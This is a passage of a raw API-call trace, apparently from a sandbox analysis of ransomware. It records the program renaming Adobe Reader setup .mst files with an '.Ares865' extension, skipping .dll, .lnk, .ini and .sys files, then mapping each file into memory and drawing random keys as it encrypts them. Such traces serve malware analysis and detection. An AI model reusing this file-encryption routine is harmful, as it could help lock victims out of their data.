returned 4 [0154.679] lstrcmpiW (lpString1="1045.mst", lpString2=".dll") returned 1 [0154.679] lstrlenW (lpString=".lnk") returned 4 [0154.679] lstrcmpiW (lpString1="1045.mst", lpString2=".lnk") returned 1 [0154.679] lstrlenW (lpString=".ini") returned 4 [0154.679] lstrcmpiW (lpString1="1045.mst", lpString2=".ini") returned 1 [0154.679] lstrlenW (lpString=".sys") returned 4 [0154.679] lstrcmpiW (lpString1="1045.mst", lpString2=".sys") returned 1 [0154.679] lstrlenW (lpString="1045.mst") returned 8 [0154.680] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1045.mst.Ares865") returned 108 [0154.680] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1045.mst" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1045.mst"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1045.mst.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1045.mst.ares865"), dwFlags=0x1) returned 1 [0154.682] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1045.mst.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1045.mst.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0154.682] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=37888) returned 1 [0154.682] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0154.682] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0154.682] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0154.682] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0154.683] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0154.683] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0154.683] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x9700, lpName=0x0) returned 0x170 [0154.684] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x9700) returned 0x190000 [0154.687] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0154.688] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0154.688] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0154.688] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0154.689] lstrcpyW (in: lpString1=0x2cce4b8, lpString2="1046.mst" | out: lpString1="1046.mst") returned="1046.mst" [0154.689] lstrlenW (lpString="1046.mst") returned 8 [0154.689] lstrlenW (lpString="Ares865") returned 7 [0154.689] lstrcmpiW (lpString1="046.mst", lpString2="Ares865") returned -1 [0154.689] lstrlenW (lpString=".dll") returned 4 [0154.689] lstrcmpiW (lpString1="1046.mst", lpString2=".dll") returned 1 [0154.689] lstrlenW (lpString=".lnk") returned 4 [0154.689] lstrcmpiW (lpString1="1046.mst", lpString2=".lnk") returned 1 [0154.689] lstrlenW (lpString=".ini") returned 4 [0154.689] lstrcmpiW (lpString1="1046.mst", lpString2=".ini") returned 1 [0154.689] lstrlenW (lpString=".sys") returned 4 [0154.689] lstrcmpiW (lpString1="1046.mst", lpString2=".sys") returned 1 [0154.689] lstrlenW (lpString="1046.mst") returned 8 [0154.690] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1046.mst.Ares865") returned 108 [0154.690] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1046.mst" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1046.mst"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1046.mst.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1046.mst.ares865"), dwFlags=0x1) returned 1 [0154.691] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1046.mst.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1046.mst.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0154.692] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=48640) returned 1 [0154.692] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0154.692] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0154.692] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0154.692] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0154.693] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0154.693] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0154.693] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xc100, lpName=0x0) returned 0x170 [0154.695] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xc100) returned 0x190000 [0154.697] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0154.698] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0154.698] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0154.698] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0154.699] lstrcpyW (in: lpString1=0x2cce4b8, lpString2="1048.mst" | out: lpString1="1048.mst") returned="1048.mst" [0154.700] lstrlenW (lpString="1048.mst") returned 8 [0154.700] lstrlenW (lpString="Ares865") returned 7 [0154.700] lstrcmpiW (lpString1="048.mst", lpString2="Ares865") returned -1 [0154.700] lstrlenW (lpString=".dll") returned 4 [0154.700] lstrcmpiW (lpString1="1048.mst", lpString2=".dll") returned 1 [0154.700] lstrlenW (lpString=".lnk") returned 4 [0154.700] lstrcmpiW (lpString1="1048.mst", lpString2=".lnk") returned 1 [0154.700] lstrlenW (lpString=".ini") returned 4 [0154.700] lstrcmpiW (lpString1="1048.mst", lpString2=".ini") returned 1 [0154.700] lstrlenW (lpString=".sys") returned 4 [0154.700] lstrcmpiW (lpString1="1048.mst", lpString2=".sys") returned 1 [0154.700] lstrlenW (lpString="1048.mst") returned 8 [0154.700] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1048.mst.Ares865") returned 108 [0154.700] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1048.mst" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1048.mst"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1048.mst.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1048.mst.ares865"), dwFlags=0x1) returned 1 [0154.702] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1048.mst.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1048.mst.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0154.702] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=40448) returned 1 [0154.702] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0154.702] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0154.702] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0154.702] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0154.703] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0154.703] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0154.703] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xa100, lpName=0x0) returned 0x170 [0154.705] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xa100) returned 0x190000 [0154.707] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0154.708] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0154.708] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0154.708] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0154.709] lstrcpyW (in: lpString1=0x2cce4b8, lpString2="1049.mst" | out: lpString1="1049.mst") returned="1049.mst" [0154.709] lstrlenW (lpString="1049.mst") returned 8 [0154.710] lstrlenW (lpString="Ares865") returned 7 [0154.710] lstrcmpiW (lpString1="049.mst", lpString2="Ares865") returned -1 [0154.710] lstrlenW (lpString=".dll") returned 4 [0154.710] lstrcmpiW (lpString1="1049.mst", lpString2=".dll") returned 1 [0154.710] lstrlenW (lpString=".lnk") returned 4 [0154.710] lstrcmpiW (lpString1="1049.mst", lpString2=".lnk") returned 1 [0154.710] lstrlenW (lpString=".ini") returned 4 [0154.710] lstrcmpiW (lpString1="1049.mst", lpString2=".ini") returned 1 [0154.710] lstrlenW (lpString=".sys") returned 4 [0154.710] lstrcmpiW (lpString1="1049.mst", lpString2=".sys") returned 1 [0154.710] lstrlenW (lpString="1049.mst") returned 8 [0154.710] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1049.mst.Ares865") returned 108 [0154.710] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1049.mst" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1049.mst"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1049.mst.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1049.mst.ares865"), dwFlags=0x1) returned 1 [0154.712] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1049.mst.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1049.mst.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0154.712] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=37888) returned 1 [0154.712] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0154.712] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0154.712] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0154.712] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0154.713] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0154.713] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0154.713] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x9700, lpName=0x0) returned 0x170 [0154.715] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x9700) returned 0x190000 [0154.717] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0154.718] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0154.718] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0154.718] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0154.719] lstrcpyW (in: lpString1=0x2cce4b8, lpString2="1050.mst" | out: lpString1="1050.mst") returned="1050.mst" [0154.719] lstrlenW (lpString="1050.mst") returned 8 [0154.719] lstrlenW (lpString="Ares865") returned 7 [0154.720] lstrcmpiW (lpString1="050.mst", lpString2="Ares865") returned -1 [0154.720] lstrlenW (lpString=".dll") returned 4 [0154.720] lstrcmpiW (lpString1="1050.mst", lpString2=".dll") returned 1 [0154.720] lstrlenW (lpString=".lnk") returned 4 [0154.720] lstrcmpiW (lpString1="1050.mst", lpString2=".lnk") returned 1 [0154.720] lstrlenW (lpString=".ini") returned 4 [0154.720] lstrcmpiW (lpString1="1050.mst", lpString2=".ini") returned 1 [0154.720] lstrlenW (lpString=".sys") returned 4 [0154.720] lstrcmpiW (lpString1="1050.mst", lpString2=".sys") returned 1 [0154.720] lstrlenW (lpString="1050.mst") returned 8 [0154.720] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1050.mst.Ares865") returned 108 [0154.720] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1050.mst" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1050.mst"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1050.mst.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1050.mst.ares865"), dwFlags=0x1) returned 1 [0154.722] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1050.mst.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1050.mst.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0154.722] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=38400) returned 1 [0154.722] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0154.722] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0154.722] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0154.722] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0154.723] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0154.723] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0154.723] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x9900, lpName=0x0) returned 0x170 [0154.725] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x9900) returned 0x190000 [0154.727] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0154.728] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0154.728] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0154.728] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0154.729] lstrcpyW (in: lpString1=0x2cce4b8, lpString2="1051.mst" | out: lpString1="1051.mst") returned="1051.mst" [0154.729] lstrlenW (lpString="1051.mst") returned 8 [0154.729] lstrlenW (lpString="Ares865") returned 7 [0154.729] lstrcmpiW (lpString1="051.mst", lpString2="Ares865") returned -1 [0154.729] lstrlenW (lpString=".dll") returned 4 [0154.729] lstrcmpiW (lpString1="1051.mst", lpString2=".dll") returned 1 [0154.730] lstrlenW (lpString=".lnk") returned 4 [0154.730] lstrcmpiW (lpString1="1051.mst", lpString2=".lnk") returned 1 [0154.730] lstrlenW (lpString=".ini") returned 4 [0154.730] lstrcmpiW (lpString1="1051.mst", lpString2=".ini") returned 1 [0154.730] lstrlenW (lpString=".sys") returned 4 [0154.730] lstrcmpiW (lpString1="1051.mst", lpString2=".sys") returned 1 [0154.730] lstrlenW (lpString="1051.mst") returned 8 [0154.730] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1051.mst.Ares865") returned 108 [0154.730] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1051.mst" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1051.mst"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1051.mst.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1051.mst.ares865"), dwFlags=0x1) returned 1 [0154.732] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1051.mst.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1051.mst.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0154.732] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=38400) returned 1 [0154.732] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0154.732] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0154.732] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0154.732] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0154.733] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0154.733] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0154.733] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x9900, lpName=0x0) returned 0x170 [0154.735] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x9900) returned 0x190000 [0154.740] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0154.741] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0154.741] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0154.741] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0154.742] lstrcpyW (in: lpString1=0x2cce4b8, lpString2="1053.mst" | out: lpString1="1053.mst") returned="1053.mst" [0154.742] lstrlenW (lpString="1053.mst") returned 8 [0154.742] lstrlenW (lpString="Ares865") returned 7 [0154.742] lstrcmpiW (lpString1="053.mst", lpString2="Ares865") returned -1 [0154.742] lstrlenW (lpString=".dll") returned 4 [0154.742] lstrcmpiW (lpString1="1053.mst", lpString2=".dll") returned 1 [0154.742] lstrlenW (lpString=".lnk") returned 4 [0154.742] lstrcmpiW (lpString1="1053.mst", lpString2=".lnk") returned 1 [0154.742] lstrlenW (lpString=".ini") returned 4 [0154.742] lstrcmpiW (lpString1="1053.mst", lpString2=".ini") returned 1 [0154.742] lstrlenW (lpString=".sys") returned 4 [0154.742] lstrcmpiW (lpString1="1053.mst", lpString2=".sys") returned 1 [0154.742] lstrlenW (lpString="1053.mst") returned 8 [0154.742] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1053.mst.Ares865") returned 108 [0154.743] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1053.mst" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1053.mst"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1053.mst.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1053.mst.ares865"), dwFlags=0x1) returned 1 [0154.744] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1053.mst.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1053.mst.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0154.744] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=46080) returned 1 [0154.744] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0154.745] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0154.745] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0154.745] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0154.745] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0154.745] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0154.745] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xb700, lpName=0x0) returned 0x170 [0154.747] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xb700) returned 0x190000 [0154.750] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0154.751] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0154.751] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0154.751] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0154.752] lstrcpyW (in: lpString1=0x2cce4b8, lpString2="1055.mst" | out: lpString1="1055.mst") returned="1055.mst" [0154.752] lstrlenW (lpString="1055.mst") returned 8 [0154.752] lstrlenW (lpString="Ares865") returned 7 [0154.752] lstrcmpiW (lpString1="055.mst", lpString2="Ares865") returned -1 [0154.752] lstrlenW (lpString=".dll") returned 4 [0154.752] lstrcmpiW (lpString1="1055.mst", lpString2=".dll") returned 1 [0154.752] lstrlenW (lpString=".lnk") returned 4 [0154.752] lstrcmpiW (lpString1="1055.mst", lpString2=".lnk") returned 1 [0154.752] 